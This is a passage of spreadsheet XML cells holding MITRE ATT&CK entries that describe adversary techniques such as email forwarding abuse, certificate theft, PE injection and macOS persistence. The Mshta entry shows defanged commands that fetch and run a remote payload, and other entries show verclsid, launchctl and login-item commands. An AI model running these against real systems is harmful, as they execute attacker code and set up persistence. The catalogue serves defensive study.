    <t>Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)
In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.
https://attack.mitre.org/techniques/T1114/003</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
https://attack.mitre.org/techniques/T1074</t>
  </si>
  <si>
    <t>T1649</t>
  </si>
  <si>
    <t>Steal or Forge Authentication Certificates</t>
  </si>
  <si>
    <t>Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.
Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)
https://attack.mitre.org/techniques/T1649</t>
  </si>
  <si>
    <t>T1098.005</t>
  </si>
  <si>
    <t>Device Registration</t>
  </si>
  <si>
    <t>Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.
MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)
Similarly, an adversary with existing access to a network may register a device to Entra ID and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) 
Devices registered in Entra ID may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Entra ID tenant by registering a large number of devices.(Citation: AADInternals - BPRT)
https://attack.mitre.org/techniques/T1098/005</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. &lt;code&gt;show ip sockets&lt;/code&gt;, &lt;code&gt;show tcp brief&lt;/code&gt;).(Citation: US-CERT-TA18-106A)
https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)
By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
https://attack.mitre.org/techniques/T1584</t>
  </si>
  <si>
    <t>T1553.005</t>
  </si>
  <si>
    <t>Mark-of-the-Web Bypass</t>
  </si>
  <si>
    <t>Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named &lt;code&gt;Zone.Identifier&lt;/code&gt; with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file is not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)
https://attack.mitre.org/techniques/T1553/005</t>
  </si>
  <si>
    <t>T1600.002</t>
  </si>
  <si>
    <t>Disable Crypto Hardware</t>
  </si>
  <si>
    <t>Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.
Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)
https://attack.mitre.org/techniques/T1600/002</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)
Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses.
https://attack.mitre.org/techniques/T1542</t>
  </si>
  <si>
    <t>T1612</t>
  </si>
  <si>
    <t>Build Image on Host</t>
  </si>
  <si>
    <t>Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote &lt;code&gt;build&lt;/code&gt; request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image)
An adversary may take advantage of that &lt;code&gt;build&lt;/code&gt; API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it’s a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment.
https://attack.mitre.org/techniques/T1612</t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. 
PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt;, then invoked with &lt;code&gt;CreateRemoteThread&lt;/code&gt; or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/002</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Verclsid</t>
  </si>
  <si>
    <t>Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)
Adversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running &lt;code&gt;verclsid.exe /S /C {CLSID}&lt;/code&gt;, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since the binary may be signed and/or native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub)
https://attack.mitre.org/techniques/T1218/012</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).
https://attack.mitre.org/techniques/T1586</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: &lt;code&gt;launchctl load&lt;/code&gt;,&lt;code&gt;launchctl unload&lt;/code&gt;, and &lt;code&gt;launchctl start&lt;/code&gt;. Adversaries can use scripts or manually run the commands &lt;code&gt;launchctl load -w "%s/Library/LaunchAgents/%s"&lt;/code&gt; or &lt;code&gt;/bin/launchctl load&lt;/code&gt; to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)
https://attack.mitre.org/techniques/T1569/001</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).
https://attack.mitre.org/techniques/T1584/005</t>
  </si>
  <si>
    <t>T1059.008</t>
  </si>
  <si>
    <t>Network Device CLI</t>
  </si>
  <si>
    <t>Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 
Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).
Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)
https://attack.mitre.org/techniques/T1059/008</t>
  </si>
  <si>
    <t>T1552.003</t>
  </si>
  <si>
    <t>Bash History</t>
  </si>
  <si>
    <t>Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s &lt;code&gt;.bash_history&lt;/code&gt; file. For each user, this file resides at the same location: &lt;code&gt;~/.bash_history&lt;/code&gt;. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)
https://attack.mitre.org/techniques/T1552/003</t>
  </si>
  <si>
    <t>T1562.010</t>
  </si>
  <si>
    <t>Downgrade Attack</t>
  </si>
  <si>
    <t>Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. 
Adversaries may downgrade and use various less-secure versions of features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) or [Network Sniffing](https://attack.mitre.org/techniques/T1040).(Citation: Praetorian TLS Downgrade Attack 2014) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)(Citation: att_def_ps_logging)
Adversaries may similarly target network traffic to downgrade from an encrypted HTTPS connection to an unsecured HTTP connection that exposes network data in clear text.(Citation: Targeted SSL Stripping Attacks Are Real)(Citation: Crowdstrike Downgrade)
https://attack.mitre.org/techniques/T1562/010</t>
  </si>
  <si>
    <t>T1559.003</t>
  </si>
  <si>
    <t>XPC Services</t>
  </si>
  <si>
    <t>Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service &lt;code&gt;C API&lt;/code&gt; or the high level &lt;code&gt;NSXPCConnection API&lt;/code&gt; in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
https://attack.mitre.org/techniques/T1559/003</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t>Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)
https://attack.mitre.org/techniques/T1497</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
https://attack.mitre.org/techniques/T1102</t>
  </si>
  <si>
    <t>T1552.001</t>
  </si>
  <si>
    <t>Credentials In Files</t>
  </si>
  <si>
    <t>Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP)
In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)
https://attack.mitre.org/techniques/T1552/001</t>
  </si>
  <si>
    <t>T1568.003</t>
  </si>
  <si>
    <t>DNS Calculation</t>
  </si>
  <si>
    <t>Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)
https://attack.mitre.org/techniques/T1568/003</t>
  </si>
  <si>
    <t>T1218.005</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) 
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
https://attack.mitre.org/techniques/T1218/005</t>
  </si>
  <si>
    <t>T1547.015</t>
  </si>
  <si>
    <t>Login Items</t>
  </si>
  <si>
    <t>Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call &lt;code&gt;SMLoginItemSetEnabled&lt;/code&gt;.
Login items installed using the Service Management Framework leverage &lt;code&gt;launchd&lt;/code&gt;, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.
Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as &lt;code&gt;tell application “System Events” to make login item at end with properties /path/to/executable&lt;/code&gt;.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)
https://attack.mitre.org/techniques/T1547/015</t>
  </si>
  <si>
    <t>T1608</t>
  </si>
  <si>
    <t>Stage Capabilities</t>
  </si>
  <si>
    <t>Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)
Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):
* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)
* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)
* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)
* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)
https://attack.mitre.org/techniques/T1608</t>
  </si>
  <si>
    <t>T1608.005</t>
  </si>
  <si>
    <t>Link Target</t>
  </si>
  <si>
    <t>Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. 
